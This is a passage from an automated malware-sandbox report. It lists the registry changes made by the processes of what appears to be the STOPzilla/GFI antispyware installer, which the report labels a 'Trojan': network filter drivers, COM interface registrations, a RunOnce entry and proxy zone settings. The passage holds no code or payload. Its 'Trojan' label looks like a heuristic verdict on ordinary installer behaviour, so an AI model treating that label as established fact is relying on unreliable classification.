"Route" = "{D720734D-0C14-4C25-829D-F6B4814978B3}, {50CD5E3E-0F08-4519-A9EF-B9802ED12701}, {5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, {B22E8C55-CC74-4FBE-B907-F46D25953BEC}, {CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, {CFCD29B3-A836-426F-8329-8362EC941293}"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"FSFilter Content Screener" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"AlwaysSecure" = "0"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"*IfType" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"RootDevice" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}, NdisWanIpv6"

[HKLM\System\CurrentControlSet\services\sbapifs\Instances]
"DefaultInstance" = "ActiveProtection"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NetCfgInstanceId" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"

[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"StatInspEnabled" = "1"

[HKLM\SYSTEM\Setup\SetupapiLogStatus]
"setupapi.dev.log" = "4096"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"ComponentID" = "sb_sbfwimclmp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Export" = "\Device\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"

[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000200000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"

[HKLM\System\CurrentControlSet\Control\Network\NetCfgLockHolder]
"(Default)" = "SBFWIM_Installer"

[HKLM\System\CurrentControlSet\services\NDIS\IfTypes\1]
"IfType" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0000"

[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey\Ndi]
"Service" = "SBFWIMCLMP"

[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanBh]
"UpperBindings" = "\Device\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"GlobalAssocChangedCounter" = "56"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"tcpipcfg.dll,-50001" = "Transmission Control Protocol/Internet Protocol. The default wide area network protocol that provides communication across diverse interconnected networks."

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"ComponentID" = "sb_SBFWIMcl"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"FilterInfId" = "sb_sbfwimcl"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"RootDevice" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}, NdisWanIp"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\Descriptions]
"GFI Software Firewall NDIS IM Filter Miniport" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"lltdres.dll,-4" = "Used to discover and locate other PCs, devices, and network infrastructure components on the network. Also used to determine network bandwidth."

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"DefaultNameResourceId" = "1801"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"DefaultNameResourceId" = "1801"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008]
"NetCfgInstanceId" = "{360A33D7-AC4E-4F80-8799-45E95D991A99}"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"UpperRange" = "noupper"

[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Flags" = "2"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterDeviceInfId" = "sb_SBFWIMclmp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"*IfType" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"FilterList" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"

[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0003\Device Parameters]
"InstanceIndex" = "4"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"TimeStamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 38 00 3F 03"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"lltdres.dll,-3" = "Allows this PC to be discovered and located on the network."

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\services\WfpLwf\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey\Ndi]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{360A33D7-AC4E-4F80-8799-45E95D991A99}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{360A33D7-AC4E-4F80-8799-45E95D991A99}]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{B1422D78-82BA-4FD0-B38A-6203899A1A72}]
[HKLM\System\CurrentControlSet\Control\Network\NetCfgLockHolder]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{B1422D78-82BA-4FD0-B38A-6203899A1A72}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{0D252192-084F-4C37-8DED-14986BA82F63}]
[HKLM\System\CurrentControlSet\services\WfpLwf\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}\{B70D6460-3635-4D42-B866-B8AB1A24454C}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{0D252192-084F-4C37-8DED-14986BA82F63}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"FilterList"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Route"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Bind"
"BindPath"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Bind"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"FilterList"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"FilterList"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Route"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Route"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Route"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"FilterList"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"BindPath"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"BindPath"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Bind"
"BindPath"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PnPSysprep\ServiceStartTypeBackup]
"SBFWIMCLMP"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Bind"

The process SBAMSvc.exe:3448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432146"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"sbamui"

The process %original file name%.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates]
"27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"

The process runonce.exe:3092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"

The process runonce.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"

The process DrvInst.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process DrvInst.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process STOPzilla.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432178"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "STOPzilla.exe"

The process RUNDLL32.exe:3528 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Altitude" = "268000"

[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"EventMessageFile" = "%SystemRoot%\System32\drivers\sbapifs.sys"

[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Flags" = "2"

[HKLM\System\CurrentControlSet\services\sbapifs]
"SupportedFeatures" = "3"

[HKLM\System\CurrentControlSet\services\sbapifs\Instances]
"DefaultInstance" = "ActiveProtection"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"FSFilter Content Screener" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"TypesSupported" = "7"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PnPSysprep\ServiceStartTypeBackup]
"sbapifs"

The process regsvr32.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}]
"(Default)" = "_ISBRegistrationEvents"

[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}\NumMethods]
"(Default)" = "29"

[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}]
"(Default)" = "_ISBThreatDefinitionsEvents"

[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}]
"(Default)" = "ISBWebFilter"

[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}]
"(Default)" = "_ISBScanControlEvents"

[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}]
"(Default)" = "_ISBLanGuardEvents"

[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}]
"(Default)" = "ISBHIPS"

[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}\NumMethods]
"(Default)" = "8"

[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}\NumMethods]
"(Default)" = "5"

[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}]
"(Default)" = "ISBService"

[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}]
"(Default)" = "ISBLogger"

[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}]
"(Default)" = "_ISBWebFilterEvents"

[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}]
"(Default)" = "_ISBFirewallEvents"

[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}]
"(Default)" = "ISBActiveProtection"

[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}\NumMethods]
"(Default)" = "11"

[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}\InProcServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\sbamsvcps.dll"

[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}]
"(Default)" = "ISBRegistration"

[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}]
"(Default)" = "ISBWSC"

[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}]
"(Default)" = "_ISBEmailAVEvents"

[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}\NumMethods]
"(Default)" = "11"

[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}\NumMethods]
"(Default)" = "19"

[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}]
"(Default)" = "_ISBActiveProtectionEvents"

[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}]
"(Default)" = "ISBQuarantine"

[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}\NumMethods]
"(Default)" = "13"

[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}]
"(Default)" = "ISBThreatDefinitions"

[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}\NumMethods]
"(Default)" = "11"

[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}\NumMethods]
"(Default)" = "8"

[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}]
"(Default)" = "ISBScanControl"

[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}]
"(Default)" = "_ISBQuarantineEvents"

[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}]
"(Default)" = "ISBLanGuard"

[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}\NumMethods]
"(Default)" = "14"

[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}\NumMethods]
"(Default)" = "5"

[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}\NumMethods]
"(Default)" = "8"

[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}]
"(Default)" = "_ISBServiceEvents"

[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}]
"(Default)" = "_ISBHIPSEvents"

[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}]
"(Default)" = "ISBEmailAV"

[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}]
"(Default)" = "ISBFirewall"

[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}]
"(Default)" = "_ISBWSCEvents"

[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}]
"(Default)" = "ISBVipre"

[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}\NumMethods]
"(Default)" = "8"

[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}\NumMethods]
"(Default)" = "5"

[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}\NumMethods]
"(Default)" = "18"

[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}\NumMethods]
"(Default)" = "11"

[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}]
"(Default)" = "_ISBSoftwareUpdatesEvents"

[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}\NumMethods]
"(Default)" = "27"

[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}]
"(Default)" = "ISBSoftwareUpdates"

[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}\NumMethods]
"(Default)" = "9"

[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"

The process regsvr32.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\TypeLib]
"Version" = "1.0"

[HKCR\SBAMOutlook.SBOutlookPlugIn\CLSID]
"(Default)" = "{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}"

[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}]
"(Default)" = "ISBOutlookPlugIn"

[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}]
"(Default)" = "PSFactoryBuffer"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\ProgID]
"(Default)" = "GFI.SBOEPlugIn.1"

[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\ProgID]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn.1"

[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\VersionIndependentProgID]
"(Default)" = "GFI.SBOEPlugIn"

[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\TypeLib]
"Version" = "1.0"

[HKCR\GFI.SBWLMailPlugIn\CLSID]
"(Default)" = "{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}"

[HKCR\GFI.SBOEPlugIn.1\CLSID]
"(Default)" = "{926195BB-EF79-4201-A585-57E8CA8B9260}"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Nektra\OEAPI\Plugins]
"GFI" = "GFI.SBOEPlugIn"

[HKCR\SBAMOutlook.SBOutlookPlugIn.1]
"(Default)" = "SBOutlookPlugIn Class"

[HKCR\AppID\{AC7CD0E2-273C-4EAC-B873-904CE5E01472}]
"(Default)" = "SBOutlookExpress"

[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\GFI.SBOEPlugIn]
"(Default)" = "SBOEPlugIn Class"

[HKCR\SBAMOutlook.SBOutlookPlugIn]
"(Default)" = "SBOutlookPlugIn Class"

[HKCR\GFI.SBOEPlugIn\CLSID]
"(Default)" = "{926195BB-EF79-4201-A585-57E8CA8B9260}"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\ProgID]
"(Default)" = "GFI.SBWLMailPlugIn.1"

[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}]
"(Default)" = "ISBOEPlugIn"

[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\NumMethods]
"(Default)" = "7"

[HKCR\SBAMOutlook.SBOutlookPlugIn\CurVer]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn.1"

[HKCR\GFI.SBWLMailPlugIn.1\CLSID]
